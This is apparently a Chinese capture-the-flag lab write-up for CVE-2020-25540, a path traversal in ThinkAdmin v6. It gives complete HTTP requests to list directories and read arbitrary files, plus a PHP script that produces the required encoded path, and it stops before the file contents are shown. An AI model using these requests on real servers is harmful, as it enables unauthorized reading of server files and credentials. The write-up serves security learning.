当前位置: 首页 > news >正文

春秋云镜——CVE-2020-25540

本博客所有网络安全相关教程、漏洞原理、渗透实操、攻防技术等内容,仅用于合法安全学习、白帽技术交流、企业授权安全测试。
所有技术严禁用于未授权探测、非法入侵、数据窃取、网络攻击等任何违反《中华人民共和国网络安全法》的违法行为。
任何个人利用本文内容实施违规操作,所产生的一切法律责任与后果均由当事人自行承担,与本人无关。
倡导正向网络安全学习,坚守白帽底线,共建清朗网络环境。

一、靶机介绍

ThinkAdmin 6版本存在路径遍历漏洞,可利用该漏洞通过GET请求编码参数任意读取远程服务器上的文件.

POST /admin/index.php?s=admin/api.Update/node HTTP/2 Host: eci-2ze2reusg8pi7fbsqy9g.cloudeci1.ichunqiu.com Content-Type: application/x-www-form-urlencoded Content-Length: 13 rules=["."]

二、环境信息

靶场地址:http://eci-2ze2reusg8pi7fbsqy9g.cloudeci1.ichunqiu.com:80/admin/login.html
目标版本:ThinkAdmin v6(PHP 7.2.20)
工具:Burp Suite、PHP 在线运行环境

三、漏洞复现步骤

步骤 1:验证漏洞存在(目录遍历)

首先使用 node 接口验证目录遍历功能,确认漏洞存在:
构造 POST 请求

POST /admin/index.php?s=admin/api.Update/node HTTP/1.1 Host: eci-2ze2reusg8pi7fbsqy9g.cloudeci1.ichunqiu.com Content-Type: application/x-www-form-urlencoded Content-Length: 22 rules=["../../../flag"]

响应结果(成功)

说明:文件列表成功返回,且确认 ../../../flag 路径下存在目标文件,漏洞存在。

步骤 2:构造自定义加密算法

ThinkAdmin 的 get 接口使用了 UTF-8→GBK→36 进制两位补 0 的自定义加密算法,需编写 PHP 脚本生成正确的 encode 值:
加密脚本

<?php function encode($content) { // 1. UTF-8转GBK $string = iconv('UTF-8', 'GBK//TRANSLIT', $content); $length = strlen($string); $chars = ''; // 2. 每个字符转36进制,两位一组补0 for ($i = 0; $i < $length; $i++) { $chars .= str_pad(base_convert(ord($string[$i]), 10, 36), 2, 0, 0); } return $chars; } // 目标路径 $content = "../../../flag"; echo "Encode Result: " . encode($content); ?>

运行结果
得到加密后的 encode 值:lala1blala1blala1b2u302p2v

步骤 3:读取目标文件(flag)

使用生成的 encode 值构造 get 接口请求,读取 flag 文件:
构造 GET 请求(HTTP/1.1)

GET /admin/index.php?s=admin/api.Update/get&encode=lala1blala1blala1b2u302p2v HTTP/1.1 Host: eci-2ze2reusg8pi7fbsqy9g.cloudeci1.ichunqiu.com

响应结果(解码前)
响应体为 Base64 编码内容

解码后得到:

http://www.cnnetsun.cn/news/2700165.html

相关文章:

  • 2026年AI校招火爆!高薪+新手友好,应届生如何抢占“黄金赛道”?
  • 保姆级教程:用Adams/Car和Simulink搞定你的第一个整车联合仿真(附模型文件)
  • 微信支付回调解密踩坑记:手把手教你用wechatpay-java 0.2.12处理支付成功通知
  • Sora 2与C4D协同渲染失效真相(2024Q2实机压测报告+崩溃日志解析)
  • 用GD32F3x0驱动TDC-GP22(SSP1922)做高精度测距:从SPI配置到数据解析全流程
  • 纯硬件线跟随机器人:从逻辑门到电机驱动的全电路设计
  • Windows 11 + RTX 4090 实测:3D Gaussian Splatting 最新版(Python 3.10 + CUDA 12.3)环境搭建避坑全记录
  • 动态算子序列内存优化技术解析与Chameleon系统设计
  • 好用还专业!2026年最值得入手的专业降AIGC网站
  • WB内参避坑干货:选错直接作废!
  • 从2019年IT技能榜单看技术演进:识别基石能力与构建π型技能矩阵
  • RK3568板子上ES8316声卡驱动调试全记录:从i2c-probe失败到tinyplay播放成功
  • 从零实现MSP430驱动DHT11:单总线协议底层时序与调试实战
  • 跨平台资源嗅探利器:3步解锁全网优质内容下载新体验
  • 保姆级教程:用Python+TI毫米波雷达开发板,动手实现FMCW测距与测速
  • 2026兼具商务感与生活品味的商旅两用轻奢行李箱推荐:爱可乐王朝系列与宝藏前开盖行李箱
  • Win11/Win10双系统党的福音:用VMware虚拟机无损体验Ubuntu,随时切换不折腾
  • 4小时,8张3090,我复现了NeurIPS 2023的HQ-SAM:聊聊轻量化改进SAM的工程实践
  • 超越阈值法:用Halcon的MLP/GMM分类器做更准的颜色识别(附完整训练代码)
  • 保姆级教程:用Vaultwarden和mkcert在群晖NAS上搭建安全的Bitwarden密码库(解决HTTPS和插件登录)
  • 从静态模型到动起来:UE5.3+ControlRig小白动画入门,5分钟让你的角色‘活’一下
  • CSDN AI数字营销实测-多平台发布-测评
  • 技术探索:django-tables2如何重新定义Django数据表格架构
  • 微服务-mybatisPlus
  • openEuler磁盘扩容后,空间去哪了?一步步教你用lsblk、pvdisplay、lvdisplay、df命令排查
  • RAG 2.0 解密:从“像不像“到“对不对“,你的AI架构还停留在1.0时代吗?
  • 3大核心优势解密:Qbot本地化AI量化交易框架实战指南
  • 基于 LightGBM + Streamlit 的校园食堂销量预测与备餐建议系统实战
  • Windows取证实战:从用户目录到注册表,手把手教你定位关键证据(附常用路径清单)
  • MATLAB版随机四参数多孔结构生成工具:孔隙率可调、适配LBM仿真